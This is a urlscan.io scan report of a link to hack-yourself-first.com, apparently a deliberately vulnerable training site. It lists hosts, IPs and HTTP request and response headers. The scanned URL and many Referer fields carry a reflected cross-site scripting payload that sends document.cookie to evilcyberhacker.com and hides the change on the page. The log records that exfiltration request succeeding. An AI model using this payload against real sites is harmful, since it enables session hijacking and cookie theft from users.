Submitted URL: https://t.co/Z6JY7XraQS
Effective URL: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberha...
Submission: On February 27 via manual from GB

Summary

This website contacted 4 IPs in 2 countries across 4 domains to perform 10 HTTP transactions. The main IP is 104.42.152.64, located in San Jose, United States and belongs to MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US. The main domain is hack-yourself-first.com.
This is the only time hack-yourself-first.com was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

IP Address AS Autonomous System
1 104.244.42.197 13414 (TWITTER)
7 104.42.152.64 8075 (MICROSOFT...)
1 2606:4700:30:... 13335 (CLOUDFLAR...)
1 2a00:1450:400... 15169 (GOOGLE)
10 4
Domain Requested by
7 hack-yourself-first.com t.co
hack-yourself-first.com
1 www.google-analytics.com hack-yourself-first.com
1 evilcyberhacker.com hack-yourself-first.com
1 t.co
10 4

This site contains links to these domains. Also see Links.

Domain
www.troyhunt.com
pluralsight.com
troyhunt.com
Subject Issuer Validity Valid
t.co
DigiCert SHA2 Extended Validation Server CA
2017-01-12 -
2019-04-12
2 years crt.sh
*.google-analytics.com
Google Internet Authority G3
2019-01-29 -
2019-04-23
3 months crt.sh

This page contains 1 frames:

Primary Page: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Frame ID: 83305CA00B2CD221DA9C7831983DC0E5
Requests: 10 HTTP requests in this frame

Screenshot


Page URL History Show full URLs

  1. https://t.co/Z6JY7XraQS Page URL
  2. http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%... Page URL

Detected technologies

Overall confidence: 100%
Detected patterns
  • script /google-analytics\.com\/(?:ga|urchin|(analytics))\.js/i
  • env /^gaGlobal$/i

Overall confidence: 100%
Detected patterns
  • env /^jQuery$/i

Page Statistics

10
Requests

20 %
HTTPS

50 %
IPv6

4
Domains

4
Subdomains

4
IPs

2
Countries

135 kB
Transfer

335 kB
Size

0
Cookies

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. https://t.co/Z6JY7XraQS Page URL
  2. http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);// Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 8
  • http://www.google-analytics.com/analytics.js HTTP 307
  • https://www.google-analytics.com/analytics.js

10 HTTP transactions

Resource
Path
Size
x-fer
Type
MIME-Type
Z6JY7XraQS
t.co/
1 KB
636 B
Document
General
Full URL
https://t.co/Z6JY7XraQS
Protocol
H2
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
104.244.42.197 San Francisco, United States, ASN13414 (TWITTER - Twitter Inc., US),
Reverse DNS
Software
tsa_f /
Resource Hash
Security Headers
Name Value
Content-Security-Policy referrer always;
Strict-Transport-Security max-age=0
X-Xss-Protection 1; mode=block; report=https://twitter.com/i/xss_report

Request headers

:method
GET
:authority
t.co
:scheme
https
:path
/Z6JY7XraQS
pragma
no-cache
cache-control
no-cache
upgrade-insecure-requests
1
user-agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
accept
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
accept-encoding
gzip, deflate, br
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

status
200
cache-control
private,max-age=300
content-encoding
gzip
content-length
369
content-security-policy
referrer always;
content-type
text/html; charset=utf-8
date
Wed, 27 Feb 2019 11:30:49 GMT
expires
Wed, 27 Feb 2019 11:35:49 GMT
referrer-policy
unsafe-url
server
tsa_f
set-cookie
muc=93753f1e-d8b7-4858-b7e1-0f0e591498c8; Max-Age=63072000; Expires=Fri, 26 Feb 2021 11:30:49 GMT; Domain=t.co
strict-transport-security
max-age=0
vary
Origin
x-connection-hash
a1ca32583782700b087fb17b801dde82
x-response-time
133
x-xss-protection
1; mode=block; report=https://twitter.com/i/xss_report
Primary Request Cookie set Search
hack-yourself-first.com/
6 KB
3 KB
Document
General
Full URL
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Requested by
Host: t.co
URL: https://t.co/Z6JY7XraQS
Protocol
HTTP/1.1
Server
104.42.152.64 San Jose, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US),
Reverse DNS
Software
Microsoft-IIS/10.0 / ASP.NET
Resource Hash
20eef847c01ce515db70eaaff96d07b4b967917b5f8c4eec7ffaf0b7f73330f5
Security Headers
Name Value
X-Xss-Protection 0

Request headers

Host
hack-yourself-first.com
Connection
keep-alive
Pragma
no-cache
Cache-Control
no-cache
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer
https://t.co/Z6JY7XraQS
Accept-Encoding
gzip, deflate
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Referer
https://t.co/Z6JY7XraQS

Response headers

Cache-Control
private
Content-Length
2602
Content-Type
text/html; charset=utf-8
Content-Encoding
gzip
Vary
Accept-Encoding
Server
Microsoft-IIS/10.0
Set-Cookie
ASP.NET_SessionId=n04fkxfmtxhxngg4kx3s5rfn; path=/; HttpOnly VisitStart=2/27/2019 11:30:49 AM; path=/
X-XSS-Protection
0
X-AspNetMvc-Version
5.1
X-AspNet-Version
4.0.30319
X-Powered-By
ASP.NET
Date
Wed, 27 Feb 2019 11:30:49 GMT
site
hack-yourself-first.com/Content/
122 KB
30 KB
Stylesheet
General
Full URL
http://hack-yourself-first.com/Content/site?v=16KScglOON-KqjC5BH_Ag9wjG8aJWggpUYS6A7q1S1o1
Requested by
Host: hack-yourself-first.com
URL: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Protocol
HTTP/1.1
Server
104.42.152.64 San Jose, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US),
Reverse DNS
Software
Microsoft-IIS/10.0 / ASP.NET
Resource Hash
536f3a3a5032b2ae463001f49af8ef5dadd7490ad3c1fb33b91b053fa9b8dcd4
Security Headers
Name Value
X-Xss-Protection 0

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
hack-yourself-first.com
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept
text/css,*/*;q=0.1
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Cookie
ASP.NET_SessionId=n04fkxfmtxhxngg4kx3s5rfn; VisitStart=2/27/2019 11:30:49 AM
Connection
keep-alive
Cache-Control
no-cache
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Date
Wed, 27 Feb 2019 11:30:50 GMT
Content-Encoding
gzip
Last-Modified
Wed, 27 Feb 2019 11:30:50 GMT
Server
Microsoft-IIS/10.0
X-AspNet-Version
4.0.30319
X-Powered-By
ASP.NET
Vary
User-Agent,Accept-Encoding
Content-Type
text/css; charset=utf-8
Cache-Control
public
Content-Length
30055
X-XSS-Protection
0
Expires
Thu, 27 Feb 2020 11:30:50 GMT
jquery
hack-yourself-first.com/bundles/
82 KB
38 KB
Script
General
Full URL
http://hack-yourself-first.com/bundles/jquery?v=yMmPM1TxecYcoWtCWW3jYgH0fr9kiAasOfb-W5I001A1
Requested by
Host: hack-yourself-first.com
URL: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Protocol
HTTP/1.1
Server
104.42.152.64 San Jose, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US),
Reverse DNS
Software
Microsoft-IIS/10.0 / ASP.NET
Resource Hash
ee76f3956003c3a7bfa1e57227cb3c79d54dbab78f30e20a45b0997d7587eae4
Security Headers
Name Value
X-Xss-Protection 0

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
hack-yourself-first.com
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept
*/*
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Cookie
ASP.NET_SessionId=n04fkxfmtxhxngg4kx3s5rfn; VisitStart=2/27/2019 11:30:49 AM
Connection
keep-alive
Cache-Control
no-cache
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Date
Wed, 27 Feb 2019 11:30:50 GMT
Content-Encoding
gzip
Last-Modified
Wed, 27 Feb 2019 11:30:50 GMT
Server
Microsoft-IIS/10.0
X-AspNet-Version
4.0.30319
X-Powered-By
ASP.NET
Vary
User-Agent,Accept-Encoding
Content-Type
text/javascript; charset=utf-8
Cache-Control
public
Content-Length
38090
X-XSS-Protection
0
Expires
Thu, 27 Feb 2020 11:30:50 GMT
jqueryval
hack-yourself-first.com/bundles/
28 KB
11 KB
Script
General
Full URL
http://hack-yourself-first.com/bundles/jqueryval?v=kO9SZjRLUEvNZbFlwaT1hsJ0t0ngQHk32HeNdumCbRM1
Requested by
Host: hack-yourself-first.com
URL: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Protocol
HTTP/1.1
Server
104.42.152.64 San Jose, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US),
Reverse DNS
Software
Microsoft-IIS/10.0 / ASP.NET
Resource Hash
690aca85015d8bf37c51319a8e717bdaf00e41f5c146b86599d81a6037ca0961
Security Headers
Name Value
X-Xss-Protection 0

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
hack-yourself-first.com
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept
*/*
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Cookie
ASP.NET_SessionId=n04fkxfmtxhxngg4kx3s5rfn; VisitStart=2/27/2019 11:30:49 AM
Connection
keep-alive
Cache-Control
no-cache
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Date
Wed, 27 Feb 2019 11:30:50 GMT
Content-Encoding
gzip
Last-Modified
Wed, 27 Feb 2019 11:30:50 GMT
Server
Microsoft-IIS/10.0
X-AspNet-Version
4.0.30319
X-Powered-By
ASP.NET
Vary
User-Agent,Accept-Encoding
Content-Type
text/javascript; charset=utf-8
Cache-Control
public
Content-Length
11074
X-XSS-Protection
0
Expires
Thu, 27 Feb 2020 11:30:50 GMT
bootstrap
hack-yourself-first.com/bundles/
28 KB
10 KB
Script
General
Full URL
http://hack-yourself-first.com/bundles/bootstrap?v=NE-C7tK4A7Qr22gKpUJS59z6HQS1tlZdBjgam_8c3I01
Requested by
Host: hack-yourself-first.com
URL: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Protocol
HTTP/1.1
Server
104.42.152.64 San Jose, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US),
Reverse DNS
Software
Microsoft-IIS/10.0 / ASP.NET
Resource Hash
e15c80a9c3f11110c046f61d18a0203f8b61daaf849d0e22c44760e3196f887a
Security Headers
Name Value
X-Xss-Protection 0

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
hack-yourself-first.com
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept
*/*
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Cookie
ASP.NET_SessionId=n04fkxfmtxhxngg4kx3s5rfn; VisitStart=2/27/2019 11:30:49 AM
Connection
keep-alive
Cache-Control
no-cache
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Date
Wed, 27 Feb 2019 11:30:49 GMT
Content-Encoding
gzip
Last-Modified
Wed, 27 Feb 2019 11:30:50 GMT
Server
Microsoft-IIS/10.0
X-AspNet-Version
4.0.30319
X-Powered-By
ASP.NET
Vary
User-Agent,Accept-Encoding
Content-Type
text/javascript; charset=utf-8
Cache-Control
public
Content-Length
9857
X-XSS-Protection
0
Expires
Thu, 27 Feb 2020 11:30:50 GMT
troyhuntcom.png
hack-yourself-first.com/Images/
9 KB
9 KB
Image
General
Full URL
http://hack-yourself-first.com/Images/troyhuntcom.png
Requested by
Host: hack-yourself-first.com
URL: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Protocol
HTTP/1.1
Server
104.42.152.64 San Jose, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US),
Reverse DNS
Software
Microsoft-IIS/10.0 / ASP.NET
Resource Hash
6b6611a92af863bc45c3070521e7a8f521ab1cd195412937a8f18435d0de541f
Security Headers
Name Value
X-Xss-Protection 0

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
hack-yourself-first.com
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept
image/webp,image/apng,image/*,*/*;q=0.8
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Cookie
ASP.NET_SessionId=n04fkxfmtxhxngg4kx3s5rfn; VisitStart=2/27/2019 11:30:49 AM
Connection
keep-alive
Cache-Control
no-cache
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Date
Wed, 27 Feb 2019 11:30:49 GMT
Last-Modified
Fri, 04 Jan 2019 11:26:45 GMT
Server
Microsoft-IIS/10.0
X-Powered-By
ASP.NET
ETag
"51bdba5f20a4d41:0"
Content-Type
image/png
Accept-Ranges
bytes
Content-Length
9299
X-XSS-Protection
0
pluralsight.png
hack-yourself-first.com/Images/
16 KB
17 KB
Image
General
Full URL
http://hack-yourself-first.com/Images/pluralsight.png
Requested by
Host: hack-yourself-first.com
URL: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Protocol
HTTP/1.1
Server
104.42.152.64 San Jose, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US),
Reverse DNS
Software
Microsoft-IIS/10.0 / ASP.NET
Resource Hash
42f0f88f2dbc9e47fcd16cf2515ca7892bb0279b2b6aeba593854e15a5e7dbfa
Security Headers
Name Value
X-Xss-Protection 0

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
hack-yourself-first.com
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept
image/webp,image/apng,image/*,*/*;q=0.8
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Cookie
ASP.NET_SessionId=n04fkxfmtxhxngg4kx3s5rfn; VisitStart=2/27/2019 11:30:49 AM
Connection
keep-alive
Cache-Control
no-cache
Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Date
Wed, 27 Feb 2019 11:30:49 GMT
Last-Modified
Fri, 04 Jan 2019 11:26:45 GMT
Server
Microsoft-IIS/10.0
X-Powered-By
ASP.NET
ETag
"51bdba5f20a4d41:0"
Content-Type
image/png
Accept-Ranges
bytes
Content-Length
16766
X-XSS-Protection
0
LogCookies
evilcyberhacker.com/
22 B
22 B
Image
General
Full URL
http://evilcyberhacker.com/LogCookies?cookies=VisitStart=2/27/2019%2011:30:49%20AM
Requested by
Host: hack-yourself-first.com
URL: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Protocol
HTTP/1.1
Server
2606:4700:30::681b:83df , United States, ASN13335 (CLOUDFLARENET - Cloudflare, Inc., US),
Reverse DNS
Software
cloudflare / ASP.NET
Resource Hash
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Pragma
no-cache
Date
Wed, 27 Feb 2019 11:30:51 GMT
Content-Encoding
gzip
Server
cloudflare
X-AspNet-Version
4.0.30319
X-Powered-By
ASP.NET
Vary
Accept-Encoding
Content-Type
application/json; charset=utf-8
Cache-Control
no-cache
Connection
keep-alive
CF-RAY
4afa525cbeefbef3-FRA
Content-Length
140
Expires
-1
analytics.js
www.google-analytics.com/
Redirect Chain
  • http://www.google-analytics.com/analytics.js
  • https://www.google-analytics.com/analytics.js
43 KB
17 KB
Script
General
Full URL
https://www.google-analytics.com/analytics.js
Requested by
Host: hack-yourself-first.com
URL: http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
Protocol
H2
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
2a00:1450:4001:809::200e , Ireland, ASN15169 (GOOGLE - Google LLC, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
3e552578c7d450b023f2cd9d28f830be4335c3acc6c4ab6dadda0769f09e5f22
Security Headers
Name Value
Strict-Transport-Security max-age=10886400; includeSubDomains; preload
X-Content-Type-Options nosniff

Request headers

Referer
http://hack-yourself-first.com/Search?searchTerm=%27);var%20img=document.createElement(%22img%22);img.src=%22http://evilcyberhacker.com/LogCookies?cookies=%22%2bdocument.cookie;document.body.appendChild(img);$(%27h2%27).text(%27Nothing%20interesting%20to%20see%20here%20at%20all...%27);//
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

strict-transport-security
max-age=10886400; includeSubDomains; preload
content-encoding
gzip
x-content-type-options
nosniff
last-modified
Wed, 16 Jan 2019 20:01:45 GMT
server
Golfe2
age
3557
date
Wed, 27 Feb 2019 10:31:33 GMT
vary
Accept-Encoding
content-type
text/javascript
status
200
cache-control
public, max-age=7200
timing-allow-origin
*
alt-svc
quic=":443"; ma=2592000; v="44,43,39"
content-length
17543
expires
Wed, 27 Feb 2019 12:31:33 GMT

Redirect headers

Location
https://www.google-analytics.com/analytics.js
Non-Authoritative-Reason
HSTS

Verdicts & Comments Add Verdict or Comment

12 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| onselectstart object| onselectionchange function| queueMicrotask function| $ function| jQuery string| data_validation object| img string| GoogleAnalyticsObject function| ga object| google_tag_data object| gaplugins object| gaGlobal

0 Cookies

Security Headers

This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page

Header Value
Content-Security-Policy referrer always;
Strict-Transport-Security max-age=0
X-Xss-Protection 1; mode=block; report=https://twitter.com/i/xss_report